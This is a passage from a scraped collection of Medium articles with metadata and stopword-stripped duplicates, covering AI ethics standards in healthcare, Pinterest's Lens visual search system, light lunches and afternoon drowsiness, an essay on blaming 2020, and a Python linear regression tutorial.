While it has been acknowledged that technology has the potential for improving patient care greatly, thereby saving costs, some physicians and scientists are warning the AI community to get their ethics right first. If they don’t, we run the risk of introducing automated systems into the mix in a blind fashion, and in the healthcare context errors could potentially harm patients or even prove fatal. If errors occur, who will be accountable: machines or healthcare professionals? Recent research by Stanford University, published in the New England Journal of Medicine, raises a number of key issues which need to be addressed thoroughly before rolling out AI into healthcare. They include: Ensuring that data bias in algorithms doesn’t skew results Making sure physicians have an adequate understanding of how algorithms are developed and don’t over-rely on them Maintaining regard for clinical experience, so that the human aspect of patient care is not lost Maintaining confidentiality as the dynamics of doctor-patient relationships change Find out more by reading the article Eliminating bias from algorithms in this issue. Looking ahead Disruptive technologies like artificial intelligence pose both challenges and opportunities across all sectors. AI has already changed many aspects of daily life and will continue to have a massive impact on the lives of people and on entire societies. The important task of ironing out the many ethical questions already raised is vital to the successful adoption of these innovative technologies. IEC also contributes towards this effort as a founding member of the Open Community for Ethics in Autonomous and Intelligent Systems (OCEANIS). This community provides a space for interested organizations from around the world to share information and collaborate on initiatives and programmes, while enhancing the understanding of the role of standards in facilitating innovation. “Consensus-based international standards will play a crucial role in accelerating adoption of AI technology in industry application verticals,” says Diab. “End user societal concerns, ethical and trustworthiness considerations are being discussed and incorporated from the ground up.”
https://medium.com/e-tech/how-safe-is-ai-in-healthcare-81bd678e6f8f
[]
2019-02-06 09:29:54.296000+00:00
['Health Data', 'Health', 'Artificial Intelligence', 'Healthcare', 'Ethics']
Title AI healthcare keeping data safe building trustContent approach healthcare changing rapidly thanks Internet Things IoT continues drive demand service offering intelligent analytics machine learning advance also broadening applicability AI increasingly digitized world connected device intelligent system international standard play key role addressing ethical technical safety security aspect technology encounter daily life Work already underway joint committee AI established IEC ISO first kind consider entire AI ecosystem rather focusing individual technical aspect Headed Wael Diab senior director Huawei draw breadth application area covered IEC ISO domain expert coming different sector “Connected product service medical device automated healthcare system must safe secure one want use Trustworthiness related area resiliency reliability accuracy explainability safety security privacy must considered system perspective getgo Standardization need adopt broad approach cover AI technology consider synergy analytics big data IoT more” say Diab apple day keep algorithm away roboticallyassisted surgery virtual nursing assistant dosage error reduction connected device image analysis clinical trial AI technology already play many different role delivery healthcare treatment surgery service include improving diagnostics helping doctor make better decision patient Health insurance critical part industry also making use AI example software platform use machine learning identify reduce inefficiency claim management process fraudulent inaccurate billing waste underutilization service Others help patient choose tailored insurance coverage reduce healthcare cost assist employer looking group coverage option Digitizing healthcare personal data million patient worldwide gathered stored shared electronically healthcare management delivery system clinical research medical consultation Doctors researcher alone can’t leverage information enhance patient care growing number trial algorithm successfully mined huge number patient file medical image timely manner result diverse condition detected diagnosed Examples include certain cancer risk heart disease eyerelated condition AIpowered imaging technology learned read thousand anonymized complex eye scan detected 50 eye condition successfully accuracy level 94 algorithm matched beat performance worldleading eye specialist argument technique sifting big data rapidly could help reduce time taken patient seen consultant possibly save person’s sight many hurdle overcome trial fully approved safe AI medical context happens 94 accuracy group algorithm developer get wrong create bias impact patient negatively acknowledged technology potential improving patient care greatly thereby saving cost physician scientist warning AI community get ethic right first healthcare context error could potentially harm fatal doesn’t happen run risk introducing automated system mix blind fashion error occur accountable machine healthcare professional Recent research Stanford University published New England Journal Medicine raise number key issue need addressed thoroughly rolling AI healthcare include Ensuring data bias algorithm doesn’t skew result Making sure physician adequate understanding algorithm developed don’t overrely Maintaining regard clinical experience human aspect patient care lost Maintaining confidentiality dynamic doctorpatient relationship change Find reading article Eliminating bias algorithm issue Looking ahead Disruptive technology like artificial intelligence pose 
challenge opportunity across sector AI already changed many aspect daily life continue massive impact life people entire society important task ironing many ethical question already raised vital successful adoption innovative technology IEC also contributes towards effort founding member Open Community Ethics Autonomous Intelligent Systems OCEANIS community provides space interested organization around world share information collaborate initiative programme enhancing understanding role standard facilitating innovation “Consensusbased international standard play crucial role accelerating adoption AI technology industry application verticals” say Diab “End user societal concern ethical trustworthiness consideration discussed incorporated ground up”Tags Health Data Health Artificial Intelligence Healthcare Ethics
3,839
Building Pinterest Lens: a real world visual discovery system
Andrew Zhai | Pinterest tech lead, Visual Search Recently, we announced Lens BETA, a new way to discover objects and ideas from the world around you using your phone’s camera. Just tap the Lens icon in the Pinterest app, point it at anything and Lens will return visually similar objects, related ideas or the object in completed projects or contexts. Lens enables you to go beyond traditional uses of your phone’s camera–taking selfies or saving a scene–and turns it into a powerful discovery system. It brings the magic of Pinterest into the real world, so that anything you see can lead to a related idea on Pinterest. Here we’ll share how we built Lens and the main technical challenges we overcame. Background In 2015, we launched our first visual search experience which enables people to pinpoint parts of an image and get visually similar results. With visual search, we gained a platform to advance our technology and incrementally improve the system by optimizing for not only relevant results but engaging ones, too. Pinners have responded positively to these improvements and now generate more than 250 million unique visual searches every month. As the next evolution of visual search, we introduced real-time object detection. This not only made visual search easier to use, but we also steadily gained a corpus of objects as people saved and selected them. Since its launch, we’ve generated billions of objects in just six months’ time, and have used this data to build new technologies, such as Lens and object search. If you’re interested in a more in-depth look at how we scaled our visual search technology to billions of images and applied it across Pinterest, please take a look at our Visual Discovery at Pinterest paper that was accepted for publication at the World Wide Web (WWW) conference this year. Lens architecture A single Pin can take you down a rabbit hole of related ideas, enabling you to discover high quality content from 150M people around the world. As we developed Lens, we wanted to parallel this experience, so a single real world camera image could connect you to the 100B ideas on Pinterest. Lens combines our understanding of images and objects with our discovery technologies to offer Pinners a diverse set of results. For example, if you take a picture of a blueberry, Lens doesn’t just return blueberries: it also gives you more results such as recipes for blueberry scones and smoothies, beauty ideas like detox scrubs or tips for growing your own blueberry bush. To do this, Lens’ overall architecture is separated into two logical components. The first component is our query understanding layer where we derive information regarding the given input image. Here we compute visual features such as detecting objects, computing salient colors and detecting lighting and image quality conditions. Using the visual features, we also compute semantic features such as annotations and category. The second component is our blender, as the results Lens returns come from multiple sources. We use our visual search technology to return visually similar results, object search technology to return scenes or projects with visually similar objects (more on this below) and image search which uses the derived annotations to return personalized text search results that are semantically (not visually) relevant to the input image. It’s the job of the blender to dynamically change blending ratios and result sources based on the information derived in the query understanding layer.
For instance, image search won’t be triggered if our annotations are low confidence, and object search won’t be triggered if no relevant objects are detected. As shown above, Lens results aren’t strictly visually similar, they come from multiple sources, some of which are only semantically relevant to the input image. By giving Pinners results beyond visually similar, Lens is a new type of visual discovery tool that bridges real world camera images to the Pinterest taste graph. Building object search Sometimes you see something you love, like a cool clock or a pair of sneakers, but you don’t know how to style the shoe or how the clock would look in a room. Object Search, a core component of Lens, is a new technology we built to address these problems. With the advances of deep learning resulting in technology such as improved image representations and object detection, we can now understand images like never before. Traditionally, visual search systems have treated whole images as the unit. These systems index global image representations to return images similar holistically to the given input image. With better image representations as a result of advancements in deep learning, visual search systems have reached an unprecedented level of accuracy. However, we wanted to push the bounds of visual search technology to go beyond the whole image as the unit. By utilizing our corpus of billions of objects, combined with our real-time object detector, we can understand images on a more fine grained level. Now, for the first time, we know both the location and the semantic meaning of billions of objects in our image corpus. Object search is a visual search system that treats objects as the unit. Given an input image, we find the most visually similar objects in billions of images in a fraction of a second, map those objects to the original image and return scenes containing the similar objects. Future of visual discovery The BETA launch of Lens is really just the beginning. We’re continuing to improve our visual technologies to better understand images, as we face challenges where the image is the only available signal that we have to understand user intent. This is especially difficult in the case of real world camera images as people take photos in a variety of lighting conditions with inconsistent image quality and various orientations. We’re excited by the possibilities that objects and visual search together can bring and are continuing to explore new ways of utilizing our massive scale of objects and images to build discovery products for Pinners around the world. If you’re interested in tackling these computer vision challenges and building awesome products for Pinners, please join us! Acknowledgements: Lens is a collaborative effort at Pinterest. We’d like to thank Maesen Churchill, Jeff Donahue, Shirley Du, Jamie Favazza, Michael Feng, Naveen Gavini, Jack Hsu, Yiming Jen, Jason Jia, Eric Kim, Dmitry Kislyuk, Vishwa Patel, Albert Pereta, Steven Ramkumar, Eric Sung, Eric Tzeng, Kelei Xu, Mao Ye, Zhefei Yu, Cindy Zhang, and Zhiyuan Zhang for the collaboration on the product launch, Trevor Darrell for his advisement, Yushi (Kevin) Jing, Vanja Josifovski and Evan Sharp for their support.
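Returning to the blender described above, here is a purely hypothetical sketch of that kind of decision logic; it is not Pinterest's implementation, and every name, threshold and stubbed result source is invented.

```python
from dataclasses import dataclass, field
from typing import List

# Hypothetical sketch of the blending decisions described in the article.
# All names, thresholds and stubbed result sources are invented.

@dataclass
class QueryUnderstanding:
    objects: List[str] = field(default_factory=list)
    annotations: List[str] = field(default_factory=list)
    annotation_confidence: float = 0.0

def blend(q: QueryUnderstanding) -> List[str]:
    sources: List[List[str]] = [["visually similar result"]]  # visual search always runs
    if q.objects:                                              # object search needs detected objects
        sources.append([f"scene containing a similar {o}" for o in q.objects])
    if q.annotation_confidence >= 0.5:                         # text search needs confident annotations
        sources.append([f"ideas for '{a}'" for a in q.annotations])
    # Naive round-robin blend; the real blender varies ratios dynamically.
    return [result for group in zip(*sources) for result in group]

print(blend(QueryUnderstanding(objects=["clock"], annotations=["home decor"], annotation_confidence=0.8)))
```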
https://medium.com/pinterest-engineering/building-pinterest-lens-a-real-world-visual-discovery-system-59812d8cbfbc
['Pinterest Engineering']
2017-02-22 18:35:32.806000+00:00
['Deep Learning', 'Machine Learning', 'Visual Search', 'Computer Vision', 'Engineering']
Title Building Pinterest Lens real world visual discovery systemContent Andrew Zhai Pinterest tech lead Visual Search Recently announced Lens BETA new way discover object idea world around using phone’s camera tap Lens icon Pinterest app point anything Lens return visually similar object related idea object completed project context Lens enables go beyond traditional us phone’s camera–taking selfies saving scene–and turn powerful discovery system brings magic Pinterest real world anything see lead related idea Pinterest we’ll share built Lens main technical challenge overcame Background 2015 launched first visual search experience enables people pinpoint part image get visually similar result visual search gained platform advance technology incrementally improve system optimizing relevant result engaging one Pinners responded positively improvement generate 250 million unique visual search every month next evolution visual search introduced realtime object detection made visual search easier use also steadily gained corpus object people saved selected Since launch we’ve generated billion object six month’s time used data build new technology Lens object search you’re interested indepth look scaled visual search technology billion image applied across Pinterest please take look Visual Discovery Pinterest paper accepted publication World Wide Web WWW conference year Lens architecture single Pin take rabbit hole related idea enabling discover high quality content 150M people around world developed Lens wanted parallel experience single real world camera image could connect 100B idea Pinterest Lens combine understanding image object discovery technology offer Pinners diverse set result example take picture blueberry Lens doesn’t return blueberry also give result recipe blueberry scone smoothy beauty idea like detox scrub tip growing blueberry bush Lens’ overall architecture separated two logical component first component query understanding layer derive information regarding given input image compute visual feature detecting object computing salient color detecting lighting image quality condition Using visual feature also compute semantic feature annotation category second component blender result Lens return come multiple source use visual search technology return visually similar result object search technology return scene project visually similar object image search us derived annotation return personalized text search result semantically visually relevant input image It’s job blender dynamically change blending ratio result source based information derived query understanding layer instance image search won’t triggered annotation low confidence object search won’t triggered relevant object detected shown Lens result aren’t strictly visually similar come multiple source semantically relevant input image giving Pinners result beyond visually similar Lens new type visual discovery tool bridge real world camera image Pinterest taste graph Building object search Sometimes see something love like cool clock pair sneaker don’t know style shoe clock would look room Object Search core component Lens new technology built address problem advance deep learning resulting technology improved image representation object detection understand image like never Traditionally visual search system treated whole image unit system index global image representation return image similar holistically given input image better image representation result advancement deep learning visual search system reached 
unprecedented level accuracy However wanted push bound visual search technology go beyond whole image unit utilizing corpus billion object combined realtime object detector understand image fine grained level first time know location semantic meaning billion object image corpus Object search visual search system treat object unit Given input image find visually similar object billion image fraction second map object original image return scene containing similar object Future visual discovery BETA launch Lens really beginning We’re continuing improve visual technology better understand image face challenge image available signal understand user intent especially difficult case real world camera image people take photo variety lighting condition inconsistent image quality various orientation We’re excited possibility object visual search together bring continuing explore new way utilizing massive scale object image build discovery product Pinners around world you’re interested tackling computer vision challenge building awesome product Pinners please join u Acknowledgements Lens collaborative effort Pinterest We’d like thank Maesen Churchill Jeff Donahue Shirley Du Jamie Favazza Michael Feng Naveen Gavini Jack Hsu Yiming Jen Jason Jia Eric Kim Dmitry Kislyuk Vishwa Patel Albert Pereta Steven Ramkumar Eric Sung Eric Tzeng Kelei Xu Mao Ye Zhefei Yu Cindy Zhang Zhiyuan Zhang collaboration product launch Trevor Darrell advisement Yushi Kevin Jing Vanja Josifovski Evan Sharp supportTags Deep Learning Machine Learning Visual Search Computer Vision Engineering
3,840
How To Hack Your Lunch
Like most people I know, lunch is my favourite meal of the day. It’s usually our first big meal of the day, and one that we’re always looking forward to, especially after an energy-draining first half of the day. Naturally I gravitated towards heavy lunches. The things in my lunch menu included creamy spaghetti, double cheeseburgers, and the occasional pad thai on the more adventurous days. I liked to keep my lunch meals variegated, but one common thread ran through them. No matter what I had for lunch, I’d always feel lethargic and drowsy afterwards. For me, this led to a downward spiral in post-lunch productivity, which was quite annoying. Fortunately for me, I came across an article by the New York Times not so long ago that demystified this vexing phenomenon. For one, it is a natural human tendency to feel sleepy around lunch hours. Our Circadian rhythm is engineered to undergo a dip about 7 hours into waking up. This particular process is embedded within the deep recesses of our primitive brain and is therefore very difficult to suppress. One way to mitigate this problem is by maintaining a good sleep-wake schedule and getting adequate rest during the night. The second reason heavy lunches make people feel drowsy comes down to our body’s physiological processes following meals. After a particularly heavy meal, our blood flow diverts from the brain and into the gut as our body’s parasympathetic nervous system kicks into ‘rest and digest’ mode. This diversion in blood flow is responsible for making us feel a downslope in alertness, productive output and a blunted creative tendency. This same process, in reverse, causes blood to divert from the gut and into the muscles and brain when one is exposed to a threatening stimulus, which triggers the ‘fight or flight’ response. This is carried out by the sympathetic nervous system. Your muscles go into full alert mode, putting whatever process is currently under way in your digestive tract on hold. The entire process is regulated by the autonomic nervous system in the brain and spinal cord, and is particularly useful when it comes to prioritising tasks in your body. Because it’s practically impossible for parasympathetic and sympathetic activities to occur simultaneously, this system acts like a sorting machine to ensure the right task is performed during the right circumstances. Unlike the fully autopilot nature of our Circadian rhythm, we at least get to control what enters our digestive system. By the mere virtue of quantity, a heavier meal will cause an increased parasympathetic response, and hence worsen an already present propensity to slump on your chair during the afternoon hours. A lighter meal, in contrast, lessens our digestive burden and therefore dampens the effects of parasympathetic overload. In return, lighter meals have the potential to improve post-prandial productivity and reduce daytime sleepiness. I experienced the benefits that lighter meals proffered first hand and found that switching my lunch regimen to a simpler, calorie-lighter diet made me less drowsy in the afternoon, and vastly improved my post-lunch energy levels. Nowadays, I opt for a small pasta with some grilled chicken shreds or a simple green pea-and-chicken salad and a glass of water. I no longer need my ration of coffee in the afternoon to keep me awake and perform my tasks. The additional boost of energy also created for me the illusion of adding more hours to the day, as it meant I was active for more hours than I was used to.
These days, I’m an evangelist for light lunch regimens. Besides the occasional burgers and burritos that I dig into during my photoshoot days, I consistently stick to modest lunch portions while ensuring my macronutrient balance is still kept on check. If you’re a fan of heavy lunches like I was, and feel the subsequent lethargy take a huge toll on your afternoons, you should definitely try switching to this routine and see the changes it brings to your office table. This last piece may be a bit of a long-shot, but if you really capitalise on your enhanced productivity, perhaps you’ll impress your employers and see yourself bringing home an additional wad of cash every month. Now that’s a true hack.
https://jonathanoei.medium.com/how-to-hack-your-lunch-8ea89e588ef9
['Jonathan Adrian']
2020-02-04 03:25:13.559000+00:00
['Self Improvement', 'Business', 'Health', 'Productivity', 'Nutrition']
Title Hack LunchContent Like people know lunch favourite meal day It’s usually first big meal day one we’re always looking forward especially energydraining first half day Naturally gravitated towards heavy lunch thing lunch menu included creamy spaghetti double cheeseburger occasional pad thai adventurous day liked keep lunch meal variegated one thing struck common thread matter lunch I’d always feel lethargic drowsy afterwards lead downward spiral postlunch productivity quite annoying Fortunately came across article New York Times long ago demystified vexing phenomenon one natural human tendency feel sleepy around lunch hour Circadian rhythm engineered undergo dip 7 hour waking particular process embedded within deep recess primitive brain therefore difficult suppress One way mitigate problem maintaining good sleepwake schedule get adequate rest night second reason heavy lunch make people feel drowsy go body’s physiological process following meal particularly heavy meal blood flow diverts brain gut body’s parasympathetic nervous system kick ‘rest digest’ mode diversion blood flow responsible making u feel downslope alertness productive output blunted creative tendency process reverse cause blood divert gut muscle brain one exposed threatening stimulus trigger ‘fight flight’ response carried sympathetic nervous system muscle go full alert mode putting whatever process currently undertaking digestive tract hold entire process regulated autonomic nervous system brain spinal cord particularly useful come prioritising task body it’s practically impossible parasympathetic sympathetic activity occur simultaneously system act like sorting machine ensure right task performed right circumstance Unlike fully autopilot nature Circadian rhythm least get control enters digestive system mere virtue quantity heavier meal cause increased parasympathetic response hence worsen already present propensity slump chair afternoon hour lighter meal contrast lessens digestive burden therefore dampens effect parasympathetic overload return potential improve postprandial productivity reduce daytime sleepiness experienced benefit lighter meal proffered first hand found switching lunch regimen simpler calorielighter diet made le drowsy afternoon vastly improved postlunch energy level Nowadays opt small pasta grilled chicken shred simple green peaandchicken salad glass water longer need ration coffee afternoon keep awake perform task additional boost energy also created illusion adding hour day meant active hour used day I’m evangelist light lunch regimen Besides occasional burger burrito dig photoshoot day consistently stick modest lunch portion ensuring macronutrient balance still kept check you’re fan heavy lunch like feel subsequent lethargy take huge toll afternoon definitely try switching routine see change brings office table last piece may bit longshot really capitalise enhanced productivity perhaps you’ll impress employer see bringing home additional wad cash every month that’s true hackTags Self Improvement Business Health Productivity Nutrition
3,841
2020 Isn’t the Problem
When the news broke that Supreme Court Justice Ruth Bader Ginsburg had died, the instant outpouring of grief on social media was immediately followed by an outpouring of condemnation. Of a single 12-month period of time. It all amounted to: “2020 is the Worst. Year. Ever.” This year has been a steady stream of devastating wildfires, political disasters, mass whale beachings, near brushes with World War III, a global pandemic, police brutality, and a growing awareness on the part of White Americans that we didn’t actually fix racism by watching Get Out and reading half of Between the World and Me. And although no one is actually blaming 2020 for what’s happening in 2020, we are using it as a scapegoat. Declaring 2020 the worst year ever is a form of collective commiseration that gives a name to a difficult experience and makes us feel less alone. It’s a coping mechanism. But for many of us, it’s becoming less effective and more dangerous all the time. Blaming the year has become a convenient container into which we can stash every difficult truth and terrible event. It’s a way to distance ourselves from the moment. We’re choosing to believe that everything that is difficult will pass when the calendar changes. It won’t, obviously. At 12:01 a.m. on January 1, 2021 people will still be living in poverty. Racism will still threaten the lives and livelihoods of Black Americans. Our health care system will still be inadequate, and climate change will still be coming for us. All of these things will continue to be propped up by choices we make on a daily basis, and by the choices of the people we elect. The year is not the problem. We are. Which means we can do something about it. What the real problem is Every time you catch yourself falling into the 2020 trap, take a moment to look inside the container. What’s your reaction to learning that in normal times, 35 million Americans experience food insecurity, a number that has risen dramatically this year? That the wildfires in California and Oregon have released at least 83 million metric tons of carbon into the atmosphere? That Black Americans are two to three times more likely to die from Covid than White Americans? To the news that the police officers who shot and killed Breonna Taylor in her own bed will not be charged with a crime? For each of these problems, ask: Collectively, what story are we telling ourselves about it? Why the hell did this happen? What can we learn about it? What can you do about it? Turn the tic of rolling your eyes and saying “cuz 2020” into a mission to more fully understand the world. What many of us are experiencing more deeply than usual right now is instability. We’re used to making plans and having them mostly work out. We research preschools and make elaborate grocery shopping lists for project cooking. Now we’re left scrambling to figure out how the hell we’re going to take care of our children and keep our jobs, or stay healthy and not go insane from isolation, or when we can see our families who live a plane ride away. The fact that these things are unusual for us is an opportunity for reflection. For a huge, often unacknowledged, portion of the world, this volatility is normal In 2018, glaciologists from the University of Maine concluded that in the year 536 A.D. an Icelandic volcano erupted, plunging most of the Western and Northern Hemispheres into a foggy near-darkness for at least 18 months. 
Crops failed, people starved, more eruptions followed, and the Plague of Justinian wiped out something like a third of the Holy Roman Empire. Life was extremely unpleasant for about a century afterward. This revelation inspired a spate of articles ranking the worst years in history—with hot takes from historians on horrible times to be alive. While 536 has a clear edge, other generally very Eurocentric nominations include 1348, at the height of the plague in Europe, and 1492, when Christopher Columbus landed in the New World and laid the groundwork for the genocide of indigenous people and the trans-Atlantic slave trade. Years during the American Civil War and WWII were also mentioned, and as well as 1918, the beginning of the Spanish Flu pandemic that killed more than 50 million people worldwide, an almost inconceivable loss of life. Contagion. War. Natural disasters. None of these are conducive to a high quality of life. Only a masochist would actively choose to live through such events. The pandemic, though, had been like a black light shining on the hotel bedspread of modern life — we now cannot deny what we previously low-level suspected, and now that we know, we’re sure having trouble sleeping soundly. But we’re not truly that surprised. The instinct to blame it all on 2020 can be harnessed Everyone alive today is descended from humans who survived some serious shit. Some of us have clearly fared better than others — we’re still grappling with the legacy of that, and in some ways, we’re just starting. But we also have more and different tools now than in 536 or 1943 or 1968. The same technology that allows you to read a profanity-riddled pep talk from a stranger on your pocket computer when you should probably be sleeping or talking to an actual human makes it possible to connect to people around the world, research almost anything, coordinate a protest, start a letter-writing campaign — connect. When Ginsburg started law school in 1956, just over a generation of women had had the right to vote. She could make the Harvard Law Review but she couldn’t have her own credit card or mortgage. That didn’t change by saying #1956istheworst. It changed one decision, one argument, one job title at a time. No matter who wins the election, no matter if a safe and effective vaccine becomes available next week, we have a challenging road ahead. The clarity we’ve gained, the rapid change we’ve adapted to though, the realization that our individual and collective decisions matter — all of it means that we do have the power to make 2025 or 2040 the best year ever, for the most people ever.
https://forge.medium.com/2020-isnt-the-problem-f5464024b5fc
['Annaliese Griffin']
2020-09-25 05:32:57.443000+00:00
['Grief', '2020', 'Culture', 'Society', 'Future']
Title 2020 Isn’t ProblemContent news broke Supreme Court Justice Ruth Bader Ginsburg died instant outpouring grief social medium immediately followed outpouring condemnation single 12month period time amounted “2020 Worst Year Ever” year steady stream devastating wildfire political disaster mass whale beachings near brush World War III global pandemic police brutality growing awareness part White Americans didn’t actually fix racism watching Get reading half World although one actually blaming 2020 what’s happening 2020 using scapegoat Declaring 2020 worst year ever form collective commiseration give name difficult experience make u feel le alone It’s coping mechanism many u it’s becoming le effective dangerous time Blaming year become convenient container stash every difficult truth terrible event It’s way distance moment We’re choosing believe everything difficult pas calendar change won’t obviously 1201 January 1 2021 people still living poverty Racism still threaten life livelihood Black Americans health care system still inadequate climate change still coming u thing continue propped choice make daily basis choice people elect year problem mean something real problem Every time catch falling 2020 trap take moment look inside container What’s reaction learning normal time 35 million Americans experience food insecurity number risen dramatically year wildfire California Oregon released least 83 million metric ton carbon atmosphere Black Americans two three time likely die Covid White Americans news police officer shot killed Breonna Taylor bed charged crime problem ask Collectively story telling hell happen learn Turn tic rolling eye saying “cuz 2020” mission fully understand world many u experiencing deeply usual right instability We’re used making plan mostly work research preschool make elaborate grocery shopping list project cooking we’re left scrambling figure hell we’re going take care child keep job stay healthy go insane isolation see family live plane ride away fact thing unusual u opportunity reflection huge often unacknowledged portion world volatility normal 2018 glaciologists University Maine concluded year 536 AD Icelandic volcano erupted plunging Western Northern Hemispheres foggy neardarkness least 18 month Crops failed people starved eruption followed Plague Justinian wiped something like third Holy Roman Empire Life extremely unpleasant century afterward revelation inspired spate article ranking worst year history—with hot take historian horrible time alive 536 clear edge generally Eurocentric nomination include 1348 height plague Europe 1492 Christopher Columbus landed New World laid groundwork genocide indigenous people transAtlantic slave trade Years American Civil War WWII also mentioned well 1918 beginning Spanish Flu pandemic killed 50 million people worldwide almost inconceivable loss life Contagion War Natural disaster None conducive high quality life masochist would actively choose live event pandemic though like black light shining hotel bedspread modern life — cannot deny previously lowlevel suspected know we’re sure trouble sleeping soundly we’re truly surprised instinct blame 2020 harnessed Everyone alive today descended human survived serious shit u clearly fared better others — we’re still grappling legacy way we’re starting also different tool 536 1943 1968 technology allows read profanityriddled pep talk stranger pocket computer probably sleeping talking actual human make possible connect people around world research almost anything coordinate protest 
start letterwriting campaign — connect Ginsburg started law school 1956 generation woman right vote could make Harvard Law Review couldn’t credit card mortgage didn’t change saying 1956istheworst changed one decision one argument one job title time matter win election matter safe effective vaccine becomes available next week challenging road ahead clarity we’ve gained rapid change we’ve adapted though realization individual collective decision matter — mean power make 2025 2040 best year ever people everTags Grief 2020 Culture Society Future
3,842
Linear Regression
Regression analysis is one of the most important fields in statistics and machine learning. (Fig 1 — Regression) There are several regression methods available. Linear regression is one of them. Regression searches for relationships among variables. In statistical modeling and in machine learning, that relationship is used to forecast the outcome of further or future events. Linear Regression Linear regression is probably one of the most important and widely used regression techniques. It’s among the simplest regression methods. One of its main advantages is the ease of interpreting results. Linear regression models the relationship between two variables by fitting a linear equation to the observed data. One variable is considered to be an explanatory (independent) variable, and the other is considered to be a dependent variable. Fig 2 — Linear Regression relation between x and y Simple Linear Regression: Simple linear regression is the simplest case of linear regression with a single independent variable, 𝐱 = 𝑥. Multiple Linear Regression: Multiple linear regression is a case of linear regression with more than one independent variable. Polynomial Regression: Polynomial regression is a generalized case of linear regression. One assumes a polynomial dependence between the output and the inputs and, consequently, a polynomial estimated regression function. Implementing Linear Regression in Python Fig 3 — Linear Regression in Python Python Packages for Linear Regression: The package NumPy is a fundamental Python scientific package that allows many high-performance operations on single- and multi-dimensional arrays. It also offers many mathematical routines. It is open source. The package scikit-learn is a widely used Python library for machine learning, built on top of NumPy and some other packages. It provides the means for preprocessing data, reducing dimensionality, implementing regression, classification, clustering, and more. Like NumPy, scikit-learn is also open source. Simple Linear Regression with scikit-learn: Let’s start with the simplest case, which is simple linear regression. There are five basic steps when you’re implementing linear regression: Import the packages and classes that are needed. Provide the data to work with and then make the appropriate changes. Create a regression model and fit it with existing data. Check the results of model fitting to know whether the model is satisfactory or not. Apply the model for predictions. Let’s see an example where we predict the speed of a 10-year-old car. Import the modules needed. Fig 4 — Importing the needed modules Create the arrays that represent the values of the x and y axes: Fig 5 — values of x and y Execute a method that returns some important key values of Linear Regression: Fig 6 — A method to return key values Create a function that uses the slope and intercept values to return a new value. This new value represents where on the y-axis the corresponding x value will be placed: Fig 7 — Define a Function Run each value of the x array through the function. This will result in a new array with new values for the y-axis: Fig 8 — Run x through the function Draw the original scatter plot: Fig 9 — Scatter Plot Draw the line of linear regression: Fig 10 — Line of linear regression Display the diagram: plt.show() Fig 11 — Screenshot of the code with output.
Conclusion: Linear regression is easy to implement, and its output coefficients are easy to interpret. When you know that the independent and dependent variables have a linear relationship, this algorithm is the best to use because of its lower complexity compared to other algorithms. Linear regression is a great tool for analyzing the relationships among variables, but it isn’t recommended for most practical applications because it over-simplifies real-world problems by assuming a linear relationship among the variables.
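Because the code in Figs 4–11 exists only as screenshots here, the following is a hedged reconstruction of the described steps in plain Python. The car-age and speed values are placeholders rather than the article's data, and although the section is titled "with scikit-learn", the steps described (a method returning slope and intercept, a mapping function, a scatter plot and a regression line) match the scipy.stats.linregress workflow, so that is what the sketch assumes.

```python
import matplotlib.pyplot as plt
from scipy import stats

# Placeholder data (the article's real values live in the screenshots):
# x = age of the car in years, y = speed
x = [5, 7, 8, 7, 2, 17, 2, 9, 4, 11, 12, 9, 6]
y = [99, 86, 87, 88, 111, 86, 103, 87, 94, 78, 77, 85, 86]

# "Important key values" of the regression (Fig 6)
slope, intercept, r, p, std_err = stats.linregress(x, y)

def predict(age):
    """Place an x value on the fitted line y = slope * x + intercept (Fig 7)."""
    return slope * age + intercept

model = list(map(predict, x))   # new y values for each x (Fig 8)
print("Predicted speed of a 10 year old car:", predict(10))

plt.scatter(x, y)               # original scatter plot (Fig 9)
plt.plot(x, model)              # line of linear regression (Fig 10)
plt.show()                      # display the diagram (Fig 11)
```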
https://medium.com/analytics-vidhya/linear-regression-4a8054576241
['Sruti Samatkar']
2020-12-13 16:33:53.560000+00:00
['Machine Learning', 'Matplotlib', 'Python', 'Linear Regression', 'Numpy']
Title Linear RegressionContent Regression analysis one important field statistic Fig 1 — Regression machine learning several regression method available Linear regression one Regression search relationship among variable statistical modeling Machine learning relationship used forecast result future event Linear Regression Linear regression probably one important widely used regression technique It’s among simplest regression method One main advantage ease interpreting result Linear regression try form relationship two variable making linear equation observed data One variable considered descriptive variable considered dependent variable Fig 2 — Linear Regression relation x Simple Linear Regression Simple linear regression simplest case linear regression single independent variable 𝐱 𝑥 Multiple Linear Regression Multiple linear regression case linear regression one independent variable Polynomial Regression Polynomial regression generalized case linear regression One assumes polynomial dependence output input consequently polynomial estimated regression function Implementing Linear Regression Python Fig 3 — Linear Regression Python Python Packages Linear Regression package NumPy fundamental Python scientific package allows many highperformance operation single multidimensional array also offer many mathematical routine open source package scikitlearn widely used Python library machine learning built top NumPy package provides mean preprocessing data reducing dimensionality implementing regression classification clustering Like NumPy scikitlearn also open source Simple Linear Regression scikitlearn Let’s start simplest case simple linear regression five basic step you’re implementing linear regression Import package class needed Provide data work appropriate change Create regression model fit existing data Check result model fitting know whether model satisfactory Apply model prediction Lets see example predict speed 10 year old car Import module needed Fig 4 — Importing needed module Create array represent value x axis Fig 5 — value x Execute method return important key value Linear Regression Fig 6 — method return key value Create function us slope intercept value return new value new value represents yaxis corresponding x value placed Fig 7 — Define Function Run value x array function result new array new value yaxis Fig 8 — Run x function Draw original scatter plot Fig 9 — Scatter Plot Draw line linear regression Fig 10 — Line linear regression Display diagram pltshow Fig 11 — Screenshot code output Conclusion Linear Regression easy implement easier interpret output coefficientsWhen aware relationship independent dependent variable linear relationship algorithm best use due it’s le complexity compared algorithmsLinear Regression great tool analyze relationship among variable isn’t recommended practical application oversimplifies realworld problem assuming linear relationship among variablesTags Machine Learning Matplotlib Python Linear Regression Numpy
3,843
Best Data Sources for Data Scientists
